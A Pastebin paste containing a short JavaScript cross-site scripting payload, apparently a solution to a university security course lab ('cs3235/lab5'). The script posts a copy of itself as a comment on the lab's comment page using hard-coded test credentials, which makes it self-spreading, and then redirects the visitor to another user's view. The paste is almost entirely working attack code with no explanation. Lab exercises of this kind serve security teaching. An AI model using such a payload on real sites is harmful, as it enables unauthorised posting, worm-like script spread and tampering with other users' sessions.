Advertisement
Guest User

Untitled

a guest
Mar 22nd, 2017
75
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.41 KB | None | 0 0
  1. <script>
  2. var msg = unescape("%3Cscript%3E%09alert%28decodeURIComponent%28%27Originally%20posted%20from%3A%20") + encodeURIComponent(document.URL) + unescape("%27%29%29%3B%3C/script%3E") + document.URL;
  3. fetch('/cs3235/lab5/commentslab5-2.php?matric=test2&pass=test2&method=1&comment=' + escape(msg))
  4. .then(function() {
  5. document.location.assign(document.URL.replace(/&user=[a-zA-Z0-9]+/, "&user=test2"));
  6. });
  7. </script>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement